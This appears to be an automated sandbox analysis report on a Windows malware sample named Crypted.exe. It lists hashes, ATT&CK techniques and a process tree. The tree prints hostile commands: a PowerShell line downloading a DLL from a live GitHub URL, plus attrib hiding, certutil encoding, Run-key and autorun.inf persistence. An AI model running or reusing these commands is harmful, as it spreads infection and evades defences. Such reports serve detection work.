1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

Analysis

max time kernel
48s
max time network
142s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
28-07-2024 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Crypted.exe
Size

50KB
MD5

5dd57385d3af83d5a7160e9c14aa09f5
SHA1

64aabb5a9d77cbb8768779c7f3d0231465ea29f0
SHA256

1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
SHA512

05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
SSDEEP

1536:5GuV08a0ep7+bYrVNXUsyWSBY99w399hVkrf1t0:bYrVOsyWSBY99kq5W

Score

10^/10

discovery evasion execution persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/SInject2.dll

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/2312-1-0x00000000009B0000-0x00000000009C2000-memory.dmp	disable_win_def
behavioral1/files/0x0009000000016a93-3.dat	disable_win_def
behavioral1/memory/2784-5-0x00000000011F0000-0x0000000001202000-memory.dmp	disable_win_def

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	596	powershell.exe
6	596	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1152	attrib.exe
2576	attrib.exe

Drops startup file 3 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sjava.vbs	$77-caca.exe.exe

Executes dropped EXE 1 IoCs

pid	Process
2784	$77-caca.exe.exe

Loads dropped DLL 6 IoCs

pid	Process
2784	$77-caca.exe.exe
2844	WerFault.exe
2844	WerFault.exe
2844	WerFault.exe
2844	WerFault.exe
2844	WerFault.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2172136094-3310281978-782691160-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\$77-caca.exe.exe"	$77-caca.exe.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
596	powershell.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	$77-caca.exe.exe
File opened for modification	C:\autorun.inf	$77-caca.exe.exe
File created	F:\autorun.inf	$77-caca.exe.exe
File opened for modification	F:\autorun.inf	$77-caca.exe.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
2844	2784	WerFault.exe	36

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-caca.exe.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
596	powershell.exe
552	chrome.exe
552	chrome.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	596	powershell.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe
Token: SeShutdownPrivilege	552	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe
552	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2312 wrote to memory of 2188	2312	Crypted.exe	31
PID 2312 wrote to memory of 2188	2312	Crypted.exe	31
PID 2312 wrote to memory of 2188	2312	Crypted.exe	31
PID 2312 wrote to memory of 2188	2312	Crypted.exe	31
PID 2188 wrote to memory of 1152	2188	cmd.exe	33
PID 2188 wrote to memory of 1152	2188	cmd.exe	33
PID 2188 wrote to memory of 1152	2188	cmd.exe	33
PID 2188 wrote to memory of 1152	2188	cmd.exe	33
PID 2312 wrote to memory of 2724	2312	Crypted.exe	34
PID 2312 wrote to memory of 2724	2312	Crypted.exe	34
PID 2312 wrote to memory of 2724	2312	Crypted.exe	34
PID 2312 wrote to memory of 2724	2312	Crypted.exe	34
PID 1628 wrote to memory of 2784	1628	explorer.exe	36
PID 1628 wrote to memory of 2784	1628	explorer.exe	36
PID 1628 wrote to memory of 2784	1628	explorer.exe	36
PID 1628 wrote to memory of 2784	1628	explorer.exe	36
PID 2784 wrote to memory of 2528	2784	$77-caca.exe.exe	37
PID 2784 wrote to memory of 2528	2784	$77-caca.exe.exe	37
PID 2784 wrote to memory of 2528	2784	$77-caca.exe.exe	37
PID 2784 wrote to memory of 2528	2784	$77-caca.exe.exe	37
PID 2528 wrote to memory of 2576	2528	cmd.exe	39
PID 2528 wrote to memory of 2576	2528	cmd.exe	39
PID 2528 wrote to memory of 2576	2528	cmd.exe	39
PID 2528 wrote to memory of 2576	2528	cmd.exe	39
PID 2784 wrote to memory of 2564	2784	$77-caca.exe.exe	40
PID 2784 wrote to memory of 2564	2784	$77-caca.exe.exe	40
PID 2784 wrote to memory of 2564	2784	$77-caca.exe.exe	40
PID 2784 wrote to memory of 2564	2784	$77-caca.exe.exe	40
PID 2564 wrote to memory of 596	2564	cmd.exe	42
PID 2564 wrote to memory of 596	2564	cmd.exe	42
PID 2564 wrote to memory of 596	2564	cmd.exe	42
PID 2564 wrote to memory of 596	2564	cmd.exe	42
PID 2784 wrote to memory of 2712	2784	$77-caca.exe.exe	43
PID 2784 wrote to memory of 2712	2784	$77-caca.exe.exe	43
PID 2784 wrote to memory of 2712	2784	$77-caca.exe.exe	43
PID 2784 wrote to memory of 2712	2784	$77-caca.exe.exe	43
PID 2784 wrote to memory of 2844	2784	$77-caca.exe.exe	45
PID 2784 wrote to memory of 2844	2784	$77-caca.exe.exe	45
PID 2784 wrote to memory of 2844	2784	$77-caca.exe.exe	45
PID 2784 wrote to memory of 2844	2784	$77-caca.exe.exe	45
PID 552 wrote to memory of 380	552	chrome.exe	47
PID 552 wrote to memory of 380	552	chrome.exe	47
PID 552 wrote to memory of 380	552	chrome.exe	47
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48
PID 552 wrote to memory of 1116	552	chrome.exe	48

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1152	attrib.exe
2576	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:1152
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\caca\$77-caca.exe.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2724

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:1628
- C:\ProgramData\caca\$77-caca.exe.exe
  "C:\ProgramData\caca\$77-caca.exe.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2576
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2564
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:596
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2712
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2784 -s 1328
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:2844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7189758,0x7fef7189768,0x7fef7189778
  2⤵
  PID:380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1196 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:2
  2⤵
  PID:1116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1552 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:8
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1660 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:8
  2⤵
  PID:872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2180 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:1
  2⤵
  PID:1700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2188 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:1
  2⤵
  PID:1724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1288 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:2
  2⤵
  PID:1520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2320 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:1
  2⤵
  PID:1648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3644 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:8
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1608 --field-trial-handle=1264,i,14907054129173071664,9402660540457593039,131072 /prefetch:1
  2⤵
  PID:2836

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\caca\$77-caca.exe.exe

Filesize
50KB

MD5
5dd57385d3af83d5a7160e9c14aa09f5

SHA1
64aabb5a9d77cbb8768779c7f3d0231465ea29f0

SHA256
1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

SHA512
05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
210KB

MD5
5ac828ee8e3812a5b225161caf6c61da

SHA1
86e65f22356c55c21147ce97903f5dbdf363649f

SHA256
b70465f707e42b41529b4e6d592f136d9eb307c39d040d147ad3c42842b723e7

SHA512
87472912277ae0201c2a41edc228720809b8a94599c54b06a9c509ff3b4a616fcdd10484b679fa0d436e472a8fc062f4b9cf7f4fa274dde6d10f77d378c06aa6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
361B

MD5
e8f72df4083ce807165df01e79c1f735

SHA1
efc61177dd24cf24327c6607e07391d1abd4ddbe

SHA256
320688e15863ae42d490a46806865207b6dc4be2efe65ed5ad64dac81c312ac2

SHA512
068bd75bef00f17047b0820c81b72025cc4a53e53197e6cd3cc4e98dc121e6ad88b52b9a7f06383e41c9de664bff93e817bd97e68d53a43f6bdc9609dddf9694

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
a0a5df67a1ec24abec3a61d1605cc60f

SHA1
fcd464695ebf7b24419fceb10400f2038b67e0ba

SHA256
ba678bd49805f683edd71a7bc61ac00543897c477774de66b9acd407c1ff1a24

SHA512
bad1abf67ad561a36154704ab7ec7f89d51dde808b546be866562f8301ab122c10c70ef112e920142ad903780176c58e2c661047c9d079cabbdfeef56430dd90

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
48b0e4368e26650dfb61e1396026f233

SHA1
b19afca74d8a9254220ebd590dee95d69cbb6c22

SHA256
6433f6dfcbef75b9bb987a896418e60cacd1dbd732558a59d88a0b7e9998ac7d

SHA512
7f2fe72508f2366752ea5605a3f5d9bfc5bcbb59fda3e8655e7546333d04b1016377214d94375e998b6c98d89b559fd3eb28800040cc16fbd7fec71b40adc86d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\inj.bat

Filesize
257B

MD5
b09cfef3a4b4ad3d325e1da75298680d

SHA1
d78f29730c04b5d340b79ea63478488b087c01dd

SHA256
34e94c47c49e449f2b6ab4bb8157e47e538a72b46d2e4a548aa45c14546a9c26

SHA512
ff84e6abedf2aa20df541a2cd4043bb8eaacb0409d532f5b7d13869827c90b2cb122b86380332f0e191e2ce78eed5add29ad5635e5f9c54e31d0ad85baa6bdda

Download Submit
memory/2312-0-0x00000000743DE000-0x00000000743DF000-memory.dmp

Filesize
4KB

Download
memory/2312-1-0x00000000009B0000-0x00000000009C2000-memory.dmp

Filesize
72KB

Download
memory/2784-5-0x00000000011F0000-0x0000000001202000-memory.dmp

Filesize
72KB

Download